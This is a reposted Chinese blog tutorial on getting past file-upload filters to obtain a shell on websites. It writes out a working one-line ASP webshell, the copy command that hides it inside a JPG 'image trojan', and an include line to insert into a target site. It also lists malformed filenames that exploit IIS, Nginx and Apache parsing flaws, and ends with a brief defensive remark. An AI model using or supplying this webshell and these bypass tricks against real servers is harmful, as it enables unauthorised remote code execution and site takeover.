分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 代码编程

突破文件上传漏洞

发布时间:2023-09-06 01:40责任编辑:赖小花关键词:文件上传

1.利用图片捆绑木马,绕过文件类型判断

有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会把一句话放在图片里面,写成1.asp;.jpg 1.asp;jpg的格式上传上去,这样上传的时候系统检测是图片,然后在上传之后,会把这个文件当asp文件来处理,那么如何用cmd来制作一句话木马呢.

利用copy命令
详细操作为
1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)
2.<%eval request("keio")%>           存为1.asp(就是一句话木马)
3.copy 1.jpg /b + 1.asp /a  2.jpg      存为1.bat文件

解释一下代码
复制当前目录下的 1.jpg 图片和当前目录下的 1.asp 文件并以ASCII代码的方式合并为 2.jpg 图片
运行 1.bat 就会出现一个图片 2.jpg
而这个2.jpg就是已经做好的木马了

把一句话木马合并到了图片里以后
再把以下代码插入目标网站的任意文件即可
<% #include files="2.jpg"%>

防御方法:主要是防止iis将图片解析成asp,aspx,php等进行执行,图片马是配合解析漏洞或者文件包含才能正常执行,iis之前版本存在解析漏洞

IS6.0 的解析漏洞 :1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg
IIS 7.0/IIS 7.5/ Nginx <8.03 畸形解析 1.jpg/.php ?
Nginx <8.03 空字节代码执行漏洞 1.jpg%00.php ?
Apache 解析漏洞 .php.一个无效后缀 ?
还有就是 Windows 下的各种截断了,因为 win 环境下不允许一些符号命名文件,所以可以造成截断文件名的效果

突破文件上传漏洞

原文地址:https://www.cnblogs.com/l1pe1/p/8410341.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved